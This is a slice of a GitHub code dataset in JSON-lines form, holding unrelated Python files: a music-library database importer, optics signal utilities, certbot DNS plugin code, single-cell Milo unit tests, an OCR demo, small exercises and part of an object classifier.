d:\n if found : return child.text\n if child.tag == 'key' and child.text == key :\n found = True\n return None\n\nstuff = ET.parse(filename)\nall = stuff.findall('dict/dict/dict')\nprint('Dict count:', len(all))\n\nfor entry in all:\n if (lookup(entry, 'Track ID') is None): continue\n\n name = lookup(entry, 'Name')\n artist = lookup(entry, 'Artist')\n album = lookup(entry, 'Album')\n count = lookup(entry, 'Play Count')\n rating = lookup(entry, 'Rating')\n length = lookup(entry, 'Total Time')\n\n if name is None or artist is None or album is None :\n continue\n\n #print(name,artist,album,count,rating,length)\n\n cur.execute('INSERT INTO Artist (name) VALUES (%s) ON CONFLICT (name) DO NOTHING', (artist,))\n cur.execute('SELECT id FROM Artist WHERE name=%s', (artist,))\n artist_id = cur.fetchone()[0]\n\n cur.execute('INSERT INTO Album (title,artist_id) VALUES (%s,%s) ON CONFLICT (title) DO NOTHING', (album,artist_id))\n cur.execute('SELECT id FROM Album WHERE title=%s', (album,))\n album_id = cur.fetchone()[0]\n\n cur.execute('INSERT INTO Track (title,album_id,len,rating,count) VALUES (%s,%s,%s,%s,%s)', (name, album_id, length, rating, count))\n\n conn.commit()","repo_name":"vsamusenko/l33tcode_attempts","sub_path":"tracks_db.py","file_name":"tracks_db.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19402565194","text":"'''\nsingle crystal Bragg reflection\n'''\n\nfrom ocelot.optics.elements import *\n# from ocelot.optics.wave import TransferFunction\nfrom ocelot.optics.bragg import *\nfrom ocelot.optics.ray import Ray, trace as trace_ray\nfrom ocelot.gui.optics import *\n\n\nclass Signal(object):\n def __init__(self, n=100):\n self.t = np.linspace(-1,1, n)\n self.f = np.zeros_like(self.t, dtype=np.complex)\n self.n = n\n\nclass Signal3D(object):\n def __init__(self, n=100):\n self.t = np.linspace(-1,1, n)\n self.f = np.zeros_like(self.t, dtype=np.complex)\n self.n = n\n \n def field_on_axis(self):\n return self.fs[0]\n\n def field_sum_abs(self):\n return np.sum(np.abs(self.fs[:])**2)\n \n def free(self):\n pass\n\n\n\ndef read_signal(file_name, E_ref, npad = 10):\n s = Signal()\n data = np.loadtxt(file_name, dtype = complex)\n s.f = data[:,2]\n s.t = np.real(data[:,0])\n \n ''' spectrum with finer resolution '''\n s.nslice = n = len(s.f)\n s.npad = npad\n\n s.f_ = np.zeros((2*npad+1)*n, dtype=complex)\n s.f_[npad*n:(npad+1)*n] = s.f \n s.f = s.f_ \n s.t = (npad+1)*np.linspace(s.t[0], s.t[-1], len(s.f)) \n \n spec = fft.fft(s.f)\n dt = (s.t[1] - s.t[0]) * 1.e-15\n k0 = E_ref / (hbar * c) \n s.freq_k = 2*pi*(fftfreq(len(spec), d=dt) / c )\n s.freq_k = -np.roll(s.freq_k, len(spec)/2) + k0 # take into account s/t\n s.freq_ev = s.freq_k * hbar * c\n s.sp = np.roll(spec, len(spec)/2)\n \n return s\n\n\ndef plot_signal(s): \n plt.plot(s.t, np.abs(s.f))\n\ndef plot_signal_spec(s): \n plt.plot(s.freq_ev, np.abs(s.sp))\n\n\ndef plot_filters(filt, f_test=None, param='tr', ax= None):\n \n if ax == None:\n f = plt.figure()\n ax = f.add_subplot(111)\n \n ax.set_xlabel('Photon Energy [ev]')\n ax2 = ax.twinx()\n plt.grid(True)\n if param == 'tr': \n ax.set_title('Transmissivity')\n data = filt.tr\n if f_test != None: data_test = f_test.tr\n if param == 'ref': \n ax.set_title('Reflectivity')\n data = filt.ref\n if f_test != None: data_test = f_test.ref \n \n l1,=ax.plot(filt.ev, np.abs(data), 'bd')\n #ax2.plot(filt.ev, unfold_angles( np.angle(data)) , 'gd')\n l2,=ax2.plot(filt.ev, np.angle(data) , 'gd')\n \n plt.legend([l1,l2],['abs','phase'])\n \n if f_test != None:\n ax.plot(f_test.ev, np.abs(data_test), 'b--')\n #ax2.plot(f_test.ev, unfold_angles(np.angle(data_test)), 'g--')\n ax2.plot(f_test.ev, np.angle(data_test), 'g--')\n \ndef plot_spec_filt(s, filt, ax):\n \n ax.plot(s.freq_ev, np.abs(s.sp), 'b.')\n tr_r, tr_i = np.real(filt.tr), np.imag(filt.tr)\n tr_mod = np.real(np.sqrt(tr_r*tr_r + tr_i*tr_i)) #modulus of T\n \n ax.plot(filt.ev, tr_mod / np.max(tr_mod) * np.max(np.abs(s.sp)), 'r.--')\n print(s.freq_k)","repo_name":"ocelot-collab/ocelot","sub_path":"ocelot/optics/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":73,"dataset":"github-code","pt":"53"} +{"seq_id":"41621642284","text":"import os\nimport pandas as pd\nimport powerlaw\n\nRANK_DIR = \"rank\"\nSTATS_DIR = \"stats\"\nFILE_IN = \"rank_ordered.csv\"\n\nfile_path_in = os.path.join(RANK_DIR, FILE_IN)\ndf = pd.read_csv(file_path_in)\nrank_list = df[\"rank\"].to_list()\nresults = powerlaw.Fit(rank_list)\nprint(results.power_law.alpha)\nprint(results.power_law.xmin)\nR, p = results.distribution_compare('power_law', 'lognormal')\nprint(\"R: {}, p: {}\".format(R,p))","repo_name":"netgroup/as-analysis","sub_path":"powerlaw_exp.py","file_name":"powerlaw_exp.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24527120108","text":"import asyncio\n\n\nasync def handle_echo(reader, writer):\n list = {}\n print(reader)\n data = await reader.read(1024)\n message = data.decode()\n lst = message.replace('.', '').split()\n# addr = writer.get_extra_info(\"peername\")\n if(lst[0]=='put'):\n if not list:\n list[lst[1]]=[(lst[2], lst[3])]\n else:\n list[lst[1]].append((lst[2], lst[3]))\n print(list)\n writer.close()\n\n\nloop = asyncio.get_event_loop()\ncoro = asyncio.start_server(handle_echo, \"127.0.0.1\", 8181, loop=loop)\nserver = loop.run_until_complete(coro)\ntry:\n loop.run_forever()\nexcept KeyboardInterrupt:\n pass\n\nserver.close()\nloop.run_until_complete(server.wait_closed())\nloop.close()","repo_name":"Ivanlasich/python","sub_path":"PycharmProjects/hello/venv/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"54495406","text":"\"\"\"DNS Authenticator using CLouDNS API.\"\"\"\nimport functools\nimport logging\n\nimport zope.interface\nfrom certbot import errors\nfrom certbot import interfaces\nfrom certbot.plugins import dns_common\n\nfrom certbot_dns_cloudns._internal.client import ClouDNSClient\nfrom certbot_dns_cloudns._internal.resolve import resolve_alias\n\nlogger = logging.getLogger(__name__)\n\nDEFAULT_NETWORK_TIMEOUT = 45\n\n\n@zope.interface.implementer(interfaces.IAuthenticator)\n@zope.interface.provider(interfaces.IPluginFactory)\nclass Authenticator(dns_common.DNSAuthenticator):\n \"\"\"DNS Authenticator using CLouDNS API\n This Authenticator uses the ClouDNS API to fulfill a dns-01 challenge.\n \"\"\"\n\n description = ('Obtain certificates using a DNS TXT record '\n '(if you are using ClouDNS for DNS).')\n ttl = 60\n\n def __init__(self, *args, **kwargs):\n super(Authenticator, self).__init__(*args, **kwargs)\n self.credentials = None\n\n @classmethod\n def add_parser_arguments(cls, add):\n super(Authenticator, cls).add_parser_arguments(\n add, default_propagation_seconds=60\n )\n add('credentials', help='ClouDNS credentials INI file.')\n add('nameserver', help='The nameserver used to resolve CNAME aliases.')\n\n @staticmethod\n def more_info():\n return ('This plugin configures a DNS TXT record to respond to a '\n 'dns-01 challenge using the ClouDNS API.')\n\n def _setup_credentials(self):\n self.credentials = self._configure_credentials(\n 'credentials',\n 'ClouDNS credentials INI file',\n {\n 'auth-password': 'API password',\n },\n self._validate_user_ids\n )\n\n @staticmethod\n def _validate_user_ids(credentials):\n required_keys = ('auth-id', 'sub-auth-id', 'sub-auth-user')\n user_count = sum(int(credentials.conf(key) is not None)\n for key in required_keys)\n\n if user_count != 1:\n raise errors.PluginError(\n f\"{'Missing' if user_count == 0 else 'Unexpected'} \"\n f\"{'property' if user_count <= 2 else 'properties'} in \"\n f\"credentials configuration file \"\n f\"{credentials.confobj.filename}:\\n * Expected exactly one of \"\n f\"{', '.join(map(credentials.mapper, required_keys))}; \"\n f\"found {user_count}.\"\n )\n\n def _perform(self, _domain, validation_name, validation):\n self._get_client().add_txt_record(\n _domain, self._resolve_alias(validation_name), validation, self.ttl\n )\n\n def _cleanup(self, _domain, validation_name, validation):\n self._get_client().del_txt_record(\n _domain, self._resolve_alias(validation_name), validation\n )\n\n def _resolve_alias(self, validation_name):\n return resolve_alias(validation_name,\n nameserver=self.conf('nameserver'))\n\n @functools.lru_cache(maxsize=None)\n def _get_client(self):\n return ClouDNSClient(self.credentials)\n","repo_name":"inventage/certbot-dns-cloudns","sub_path":"certbot_dns_cloudns/_internal/authenticator.py","file_name":"authenticator.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"24313942876","text":"import numpy as np\nimport pandas as pd\nimport pertpy as pt\nimport pytest\nimport scanpy as sc\nfrom mudata import MuData\n\ntry:\n from rpy2.robjects.packages import importr\n\n r_dependency = importr(\"edgeR\")\nexcept Exception: # noqa: BLE001\n r_dependency = None\n\n\nclass TestMilopy:\n milo = pt.tl.Milo()\n\n @pytest.fixture\n def adata(self):\n adata = sc.datasets.pbmc68k_reduced()\n return adata\n\n def test_load(self, adata):\n mdata = self.milo.load(adata)\n assert isinstance(mdata, MuData)\n assert \"rna\" in mdata.mod\n\n def test_make_nhoods_number(self, adata):\n adata = adata.copy()\n p = 0.1\n adata = self.milo.make_nhoods(adata, prop=p, copy=True)\n assert adata.obsm[\"nhoods\"].shape[1] <= int(np.round(adata.n_obs * p))\n\n def test_make_nhoods_missing_connectivities(self, adata):\n adata = adata.copy()\n p = 0.1\n del adata.obsp[\"connectivities\"]\n with pytest.raises(KeyError):\n adata = self.milo.make_nhoods(adata, prop=p)\n\n def test_make_nhoods_sizes(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n knn_graph = adata.obsp[\"connectivities\"]\n knn_graph[knn_graph != 0] = 1\n assert knn_graph.sum(0).min() <= adata.obsm[\"nhoods\"].sum(0).min()\n\n def test_make_nhoods_neighbors_key(self, adata):\n adata = adata.copy()\n k = adata.uns[\"neighbors\"][\"params\"][\"n_neighbors\"]\n test_k = 5\n sc.pp.neighbors(adata, n_neighbors=test_k, key_added=\"test\")\n self.milo.make_nhoods(adata, neighbors_key=\"test\")\n smallest_size = adata.obsm[\"nhoods\"].toarray().sum(0).min()\n assert test_k < k\n assert smallest_size < k\n\n def test_count_nhoods_sample_values(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n # Extract cells of one nhood\n nh = 1\n sample_col = \"phase\"\n milo_mdata = self.milo.count_nhoods(adata, sample_col=sample_col)\n nh_cells = adata.obsm[\"nhoods\"][:, nh].nonzero()[0]\n\n # Value count the sample composition\n top_a = adata.obs.iloc[nh_cells].value_counts(sample_col).values.ravel()\n\n # Check it matches the one calculated\n sample_adata = milo_mdata[\"milo\"]\n df = pd.DataFrame(sample_adata.X.T[nh, :].toarray()).T\n df.index = sample_adata.obs_names\n top_b = df.sort_values(0, ascending=False).values.ravel()\n assert all((top_b - top_a) == 0), 'The counts for samples in milo_mdata[\"milo\"] does not match'\n\n def test_count_nhoods_missing_nhoods(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n sample_col = \"phase\"\n del adata.obsm[\"nhoods\"]\n with pytest.raises(KeyError):\n _ = self.milo.count_nhoods(adata, sample_col=sample_col)\n\n def test_count_nhoods_sample_order(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n # Extract cells of one nhood\n nh = 1\n sample_col = \"phase\"\n milo_mdata = self.milo.count_nhoods(adata, sample_col=sample_col)\n nh_cells = adata.obsm[\"nhoods\"][:, nh].nonzero()[0]\n\n # Value count the sample composition\n top_a = adata.obs.iloc[nh_cells].value_counts(sample_col).index[0]\n\n # Check it matches the one calculated\n sample_adata = milo_mdata[\"milo\"]\n df = pd.DataFrame(sample_adata.X.T[nh, :].toarray()).T\n df.index = sample_adata.obs_names\n top_b = df.sort_values(0, ascending=False).index[0]\n\n assert top_a == top_b, 'The order of samples in milo_mdata[\"milo\"] does not match'\n\n # @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n @pytest.fixture\n def da_nhoods_mdata(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n\n # Simulate experimental condition\n rng = np.random.default_rng(seed=42)\n adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.5, 0.5])\n # we simulate differential abundance in NK cells\n DA_cells = adata.obs[\"louvain\"] == \"1\"\n adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n )\n\n # Simulate replicates\n adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n return milo_mdata\n\n # @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_missing_samples(self, adata):\n with pytest.raises(KeyError):\n self.milo.da_nhoods(adata, design=\"~condition\")\n\n # @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_missing_covariate(self, da_nhoods_mdata):\n mdata = da_nhoods_mdata.copy()\n with pytest.raises(KeyError):\n self.milo.da_nhoods(mdata, design=\"~ciaone\")\n\n # @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_non_unique_covariate(self, da_nhoods_mdata):\n mdata = da_nhoods_mdata.copy()\n with pytest.raises(AssertionError):\n self.milo.da_nhoods(mdata, design=\"~phase\")\n\n @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_pvalues(self, da_nhoods_mdata):\n mdata = da_nhoods_mdata.copy()\n self.milo.da_nhoods(mdata, design=\"~condition\")\n sample_adata = mdata[\"milo\"].copy()\n min_p, max_p = sample_adata.var[\"PValue\"].min(), sample_adata.var[\"PValue\"].max()\n assert (min_p >= 0) & (max_p <= 1), \"P-values are not between 0 and 1\"\n\n @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_fdr(self, da_nhoods_mdata):\n mdata = da_nhoods_mdata.copy()\n self.milo.da_nhoods(mdata, design=\"~condition\")\n sample_adata = mdata[\"milo\"].copy()\n assert np.all(\n np.round(sample_adata.var[\"PValue\"], 10) <= np.round(sample_adata.var[\"SpatialFDR\"], 10)\n ), \"FDR is higher than uncorrected P-values\"\n\n @pytest.mark.skipif(r_dependency is None, reason=\"Require R dependecy\")\n def test_da_nhoods_default_contrast(self, da_nhoods_mdata):\n mdata = da_nhoods_mdata.copy()\n adata = mdata[\"rna\"].copy()\n adata.obs[\"condition\"] = (\n adata.obs[\"condition\"].astype(\"category\").cat.reorder_categories([\"ConditionA\", \"ConditionB\"])\n )\n self.milo.da_nhoods(mdata, design=\"~condition\")\n default_results = mdata[\"milo\"].var.copy()\n self.milo.da_nhoods(mdata, design=\"~condition\", model_contrasts=\"conditionConditionB-conditionConditionA\")\n contr_results = mdata[\"milo\"].var.copy()\n\n assert np.corrcoef(contr_results[\"SpatialFDR\"], default_results[\"SpatialFDR\"])[0, 1] > 0.99\n assert np.corrcoef(contr_results[\"logFC\"], default_results[\"logFC\"])[0, 1] > 0.99\n\n @pytest.fixture\n def annotate_nhoods_mdata(self, adata):\n adata = adata.copy()\n self.milo.make_nhoods(adata)\n\n # Simulate experimental condition\n rng = np.random.default_rng(seed=42)\n adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.5, 0.5])\n # we simulate differential abundance in NK cells\n DA_cells = adata.obs[\"louvain\"] == \"1\"\n adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n )\n\n # Simulate replicates\n adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n return milo_mdata\n\n def test_annotate_nhoods_missing_samples(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n del mdata.mod[\"milo\"]\n with pytest.raises(ValueError):\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n\n def test_annotate_nhoods_continuous_mean_range(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n assert mdata[\"milo\"].var[\"nhood_S_score\"].max() < mdata[\"rna\"].obs[\"S_score\"].max()\n assert mdata[\"milo\"].var[\"nhood_S_score\"].min() > mdata[\"rna\"].obs[\"S_score\"].min()\n\n def test_annotate_nhoods_continuous_correct_mean(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods_continuous(mdata, anno_col=\"S_score\")\n rng = np.random.default_rng(seed=42)\n i = rng.choice(np.arange(mdata[\"milo\"].n_obs))\n mean_val_nhood = mdata[\"rna\"].obs[mdata[\"rna\"].obsm[\"nhoods\"][:, i].toarray() == 1][\"S_score\"].mean()\n assert mdata[\"milo\"].var[\"nhood_S_score\"][i] == pytest.approx(mean_val_nhood, 0.0001)\n\n def test_annotate_nhoods_annotation_frac_range(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n self.milo.annotate_nhoods(mdata, anno_col=\"louvain\")\n assert mdata[\"milo\"].var[\"nhood_annotation_frac\"].max() <= 1.0\n assert mdata[\"milo\"].var[\"nhood_annotation_frac\"].min() >= 0.0\n\n def test_annotate_nhoods_cont_gives_error(self, annotate_nhoods_mdata):\n mdata = annotate_nhoods_mdata.copy()\n with pytest.raises(ValueError):\n self.milo.annotate_nhoods(mdata, anno_col=\"S_score\")\n\n @pytest.fixture\n def add_nhood_expression_mdata(self):\n adata = sc.datasets.pbmc3k()\n sc.pp.normalize_per_cell(adata)\n sc.pp.log1p(adata)\n sc.pp.highly_variable_genes(adata)\n sc.pp.pca(adata)\n sc.pp.neighbors(adata)\n sc.tl.leiden(adata)\n self.milo.make_nhoods(adata)\n\n # Simulate experimental condition\n rng = np.random.default_rng(seed=42)\n adata.obs[\"condition\"] = rng.choice([\"ConditionA\", \"ConditionB\"], size=adata.n_obs, p=[0.2, 0.8])\n # we simulate differential abundance in NK cells\n DA_cells = adata.obs[\"leiden\"] == \"1\"\n adata.obs.loc[DA_cells, \"condition\"] = rng.choice(\n [\"ConditionA\", \"ConditionB\"], size=sum(DA_cells), p=[0.2, 0.8]\n )\n\n # Simulate replicates\n adata.obs[\"replicate\"] = rng.choice([\"R1\", \"R2\", \"R3\"], size=adata.n_obs)\n adata.obs[\"sample\"] = adata.obs[\"replicate\"] + adata.obs[\"condition\"]\n milo_mdata = self.milo.count_nhoods(adata, sample_col=\"sample\")\n return milo_mdata\n\n def test_add_nhood_expression_nhood_mean_range(self, add_nhood_expression_mdata):\n mdata = add_nhood_expression_mdata.copy()\n self.milo.add_nhood_expression(mdata)\n assert mdata[\"milo\"].varm[\"expr\"].shape[1] == mdata[\"rna\"].n_vars\n mdata = add_nhood_expression_mdata.copy()\n self.milo.add_nhood_expression(mdata)\n nhood_ix = 10\n nhood_gex = mdata[\"milo\"].varm[\"expr\"][nhood_ix, :].toarray().ravel()\n nhood_cells = mdata[\"rna\"].obs_names[mdata[\"rna\"].obsm[\"nhoods\"][:, nhood_ix].toarray().ravel() == 1]\n mean_gex = np.array(mdata[\"rna\"][nhood_cells].X.mean(axis=0)).ravel()\n assert nhood_gex == pytest.approx(mean_gex, 0.0001)\n","repo_name":"ONERAI/pertpy","sub_path":"tests/tools/test_milo.py","file_name":"test_milo.py","file_ext":"py","file_size_in_byte":11434,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"15018682891","text":"# -*- coding: utf-8 -*-\r\n\r\ndef demo_grcnn(config_yaml):\r\n\r\n import sys\r\n sys.path.append('./recognition_model/GRCNN')\r\n\r\n import torch\r\n import os\r\n from utils import keys\r\n from models import crann\r\n import dataset\r\n from utils import util\r\n import torch.nn.functional as F\r\n import io\r\n import yaml\r\n import tools.utils as utils\r\n import tools.dataset_lmdb as dataset_lmdb\r\n import torchvision.transforms as transforms\r\n import lmdb\r\n import cv2\r\n\r\n # 需要在配置文件里体现\r\n # opt.model_path = 'checkpoints/grcnn_art/crann_11_1.pth'\r\n # batch_size = 16\r\n #imgH = 32\r\n # maxW = 100\r\n # num_workers = 4\r\n # cnn_model = 'grcnn'\r\n # rnn_model = 'compositelstm'\r\n # n_In = 512\r\n # n_Hidden = 256\r\n # test_set = '../art_test.txt'\r\n\r\n # from yacs.config import CfgNode as CN\r\n #\r\n # def read_config_file(config_file):\r\n # # 用yaml重构配置文件\r\n # f = open(config_file)\r\n # opt = CN.load_cfg(f)\r\n # return opt\r\n #\r\n # opt = read_config_file(config_file)\r\n\r\n f = open(config_yaml, encoding='utf-8')\r\n opt = yaml.load(f)\r\n\r\n\r\n\r\n alphabet = keys.alphabet\r\n nClass = len(alphabet) + 1\r\n converter = util.strLabelConverter(alphabet)\r\n\r\n model = crann.CRANN(opt, nClass).cuda()\r\n if os.path.isfile(opt['DEMO']['model_path']):\r\n print(\"=> loading checkpoint '{}'\".format(opt['DEMO']['model_path']))\r\n checkpoint = torch.load(opt['DEMO']['model_path'])\r\n start_epoch = checkpoint['epoch']\r\n # best_pred = checkpoint['best_pred']\r\n model.load_state_dict(checkpoint['state_dict'])\r\n # print(\"=> loaded checkpoint '{}' (epoch {} accuracy {})\"\r\n # .format(opt.model_path, checkpoint['epoch'], best_pred))\r\n\r\n model.eval()\r\n\r\n # root, mappinggit\r\n\r\n train_set = dataset_lmdb.lmdbDataset(opt['DEMO']['test_set_lmdb'])\r\n\r\n # train_set = dataset.testDataset(opt['test_set']) # dataset.graybackNormalize()\r\n test_loader = torch.utils.data.DataLoader(train_set,\r\n batch_size=opt['TRAIN']['BATCH_SIZE'],\r\n shuffle=False,\r\n num_workers=opt['WORKERS'],\r\n collate_fn=dataset.alignCollate(\r\n imgH=opt['TRAIN']['IMG_H'],\r\n imgW=opt['TRAIN']['MAX_W']))\r\n\r\n file = open('./pred.txt', 'w', encoding='utf-8')\r\n\r\n try:\r\n import shutil\r\n shutil.rmtree('./GRCNN_DEMO')\r\n # os.makedirs('./MORAN_DEMO')\r\n except:\r\n pass\r\n os.makedirs('./GRCNN_DEMO')\r\n record_file = open('./GRCNN_DEMO/result.txt', 'a', encoding='utf-8')\r\n\r\n\r\n\r\n index = 0\r\n for i, (cpu_images, targets) in enumerate(test_loader):\r\n\r\n # 还可以再改造一下\r\n\r\n\r\n\r\n bsz = cpu_images.size(0)\r\n images = cpu_images.cuda()\r\n\r\n predict = model(images)\r\n predict_len = torch.IntTensor([predict.size(0)] * bsz)\r\n _, acc = predict.max(2)\r\n acc = acc.transpose(1, 0).contiguous().view(-1)\r\n prob, _ = F.softmax(predict, dim=2).max(2)\r\n probilities = torch.mean(prob, dim=1)\r\n sim_preds = converter.decode(acc.data, predict_len.data, raw=False)\r\n\r\n cnt = 0\r\n for probility, pred, target in zip(probilities, sim_preds, targets):\r\n index += 1\r\n img_key = 'gt_%d' % index\r\n file.write('%s:\\t\\t\\t\\t%.3f%%\\t%-20s\\n' % (img_key, probility.item() * 100, pred))\r\n\r\n # print(\"调试开始\")\r\n # print(images[0].size)\r\n # print(\"调试结束\")\r\n\r\n # cv2.imwrite('./GRCNN_DEMO/' + str(index) + '.jpg', (images[cnt].cpu().numpy() + 1.0) * 128)\r\n record_file.write('./GRCNN_DEMO/' + str(index) + '.jpg' + ' ' + pred + ' ' + target + ' \\n')\r\n cnt += 1\r\n\r\n\r\n file.close()","repo_name":"FudanOCR/FudanOCR","sub_path":"model/demo/grcnn.py","file_name":"grcnn.py","file_ext":"py","file_size_in_byte":4027,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"25533704655","text":"import random\r\na=random.randint(0,10)\r\nproby=0\r\nb=0\r\n\r\nwhile b != a and b != \"exit\":\r\n b=input(\"Spróbuj odgadnąć wylosowaną liczbę z przedziału 1-9 lub wpisz 'exit' aby zakończyć grę: \")\r\n if b == \"exit\":\r\n break\r\n b=int(b)\r\n proby+=1\r\n if ba:\r\n print(\"Podałeś za dużą liczbę!\")\r\n else:\r\n print(\"Udało ci się!\")\r\n print(\"Musiałeś próbować aż\",proby,\"razy!\")\r\n","repo_name":"sandrakorcz/PYTHON","sub_path":"PYTHON/Zadania z practicepython.org/9.GuessingGameOne.py","file_name":"9.GuessingGameOne.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38102347570","text":"print('--------------------Question-5---------------------')\n#Creating class\nclass employee:\n # INITIALIZATION\n def __init__(self,name,salary):\n self.name=name\n self.salary=salary\n\n # Function to print Info\n def info(self):\n print(f\"Employee Name: {self.name}\")\n print(f\"Employee Salary: {self.salary} \")\n print(\"\")\n\n\n# Creating objects\nemployee1=employee(\"Mehak\",40000)\nemployee2=employee(\"Ashok\",50000)\nemployee3=employee(\"Viren\",60000)\n\n# Printing employee info\nemployee1.info()\nemployee2.info()\nemployee3.info()\n\n# Updating salary of Mehak\nemployee1.salary=70000\n\n#Printing updated info of Mehak\nprint(\"Updated record of Mehak\")\nemployee1.info()\n\n# Deleting record of Viren\ndel employee3\nprint(\"Record of Viren deleted\")\n\n\n","repo_name":"Himanshu2557/Assignment","sub_path":"Assignment_4/Sol/Q5.py","file_name":"Q5.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70560882728","text":"from ._table_row_classifier import TableRowClassifier\nimport numpy as np\n\n\nclass ObjectClassifier():\n def __init__(self, opencl_filename=\"temp_object_classifier.cl\", max_depth: int = 2, num_ensembles: int = 100, overwrite_classname:str=None):\n \"\"\"\n A RandomForestClassifier for label classification that converts itself to OpenCL after training.\n\n Parameters\n ----------\n opencl_filename : str (optional)\n max_depth : int (optional)\n num_ensembles : int (optional)\n\n See Also\n --------\n https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.RandomForestClassifier.html\n \"\"\"\n self.FEATURE_SPECIFICATION_KEY = \"feature_specification = \"\n\n self._data = {}\n\n self._classname = self.__class__.__name__\n if overwrite_classname is not None:\n self._classname = overwrite_classname\n self.opencl_filename = opencl_filename\n self.classifier = TableRowClassifier(\n opencl_filename=opencl_filename,\n max_depth=max_depth,\n num_ensembles=num_ensembles,\n overwrite_classname=self._classname\n )\n\n def __str__(self) -> str:\n \"\"\"Return classifier information as string.\"\"\"\n return str(self.classifier)\n\n def __repr__(self) -> str:\n \"\"\"Return classifier information as string.\"\"\"\n return str(self.classifier)\n\n def train(self, features: str, labels, sparse_annotation, image=None, continue_training : bool = False):\n \"\"\"\n Train a classifier that can differentiate label types according to intensity, size and shape.\n\n Parameters\n ----------\n features: Space separated string containing those:\n 'area',\n 'min_intensity', 'max_intensity', 'sum_intensity', 'mean_intensity', 'standard_deviation_intensity',\n 'mass_center_x', 'mass_center_y', 'mass_center_z',\n 'centroid_x', 'centroid_y', 'centroid_z',\n 'max_distance_to_centroid', 'max_distance_to_mass_center',\n 'mean_max_distance_to_centroid_ratio', 'mean_max_distance_to_mass_center_ratio',\n 'touching_neighbor_count', 'average_distance_of_touching_neighbors', 'average_distance_of_n_nearest_neighbors'\n labels: label image\n sparse_annotation: label image with annotations. If one label is annotated with multiple classes, the\n maximum is considered while training.\n image: intensity image (optional)\n\n \"\"\"\n self.classifier.feature_specification = features.replace(\",\", \" \")\n\n # remove too many spaces\n while \" \" in self.classifier.feature_specification:\n self.classifier.feature_specification = self.classifier.feature_specification.replace(\" \", \" \")\n self.classifier.feature_specification = self.classifier.feature_specification.strip()\n\n selected_features, gt = self._make_features(self.classifier.feature_specification, labels, sparse_annotation, image)\n self.classifier.train(selected_features, gt, continue_training=continue_training)\n self.to_opencl_file(self.opencl_filename, overwrite_classname=self.__class__.__name__)\n\n def predict(self, labels, image=None):\n \"\"\"Predict object class from label image and optional intensity image.\n\n Parameters\n ----------\n labels: label image\n image: intensity image\n\n Returns\n -------\n label image representing a semantic segmentation: pixel intensities represent label class\n\n \"\"\"\n import pyclesperanto_prototype as cle\n labels = cle.push(labels)\n\n selected_features, _ = self._make_features(self.classifier.feature_specification, labels, None, image)\n output = self.classifier.predict(selected_features)\n if len(output.shape) == 1: # backwards compatibility: make sure it's 2D\n output = cle.push([output])\n self._data[\"APOC_ObjectClassifier_CLUSTER_ID\"] = np.asarray(output)[0]\n\n # set background to zero\n cle.set_column(output, 0, 0)\n\n result_labels = cle.create_labels_like(labels)\n cle.replace_intensities(labels, output, result_labels)\n\n return result_labels\n\n def to_opencl_file(self, filename, extra_information: str = None, overwrite_classname: str = None):\n \"\"\"Save the classifier to an OpenCL-file.\n\n See Also\n --------\n .. PixelClassifier.to_opencl_file()\n \"\"\"\n if 